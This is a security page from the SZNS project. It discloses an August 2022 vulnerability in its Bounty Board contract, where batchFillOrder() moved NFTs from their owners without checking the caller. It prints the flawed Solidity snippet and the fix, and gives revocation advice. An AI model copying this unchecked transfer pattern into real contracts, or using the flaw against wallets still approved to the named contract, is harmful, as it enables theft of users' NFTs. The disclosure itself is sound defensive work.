🛡️Audits and Security

SZNS largely relies on battle tested smart contracts that have been audited by Peckshield.

Security Process

We take digital assets seriously at SZNS. If you find flaws in our smart contract architecture or serious bugs in our application please don't hesitate to reach out to our email security@szns.io.

For bugs found that hold assets at risk we will consider bug bounties up to 10% of the value at risk! Thanks for being part of the ecosystem.

Updates

Any security related reports will be included here.

Bounty Board

On August 4th, 2022, Patrick Drotleff, an IT consultant, discovered a vulnerability in the Bounty Board contract (0x879d25dB71DD9ff94452C510C13347fb49175D9D). The vulnerability was that the function batchFillOrder() does not check whether the caller owns the NFTs with which they want to fill the order to give NFTs in exchange for collection tokens. Thus, an attacker could tribute the NFTs of a user who has given approval for an NFT contract in return for collection tokens. The issue was easily fixed by replacing erc721.ownerOf(id) with msg.sender.

function batchFillOrder(
        Order calldata order,
        ERC721Grouping[] calldata erc721Groupings
    ) internal {
            ...
                if (!order.validator.meetsCriteria(address(erc721), id)) {
                    revert InvalidNftError(address(erc721), id);
                }
                // Forward NFT to benecifiary
                // NOTE: reentrancy should be safe here, since we're decrementing
                //   the number of fills based on its later value.
                erc721.safeTransferFrom(
                    erc721.ownerOf(id),
                    order.nftBeneficiary,
                    id
                );
            }
        }
        // Should throw if underflow
        remainingFills[orderHash] -= tributeCounter;
        // Payout to order filler
        order.erc20.mint(msg.sender, order.tokensPerTribute * tributeCounter);
    }

To disable approvals to this contract, go to https://revoke.cash/, connect your wallet, and revoke any allowances for the contract 0x879d25dB71DD9ff94452C510C13347fb49175D9D.

Since we were contacted by Patrick, we have reached out to individuals with ENS names who were at risk. No individuals were exploited by this vulnerability. Patrick was awarded 1 ETH as a reward.

PreviousCollection DAOsNextBug Bounty

Last updated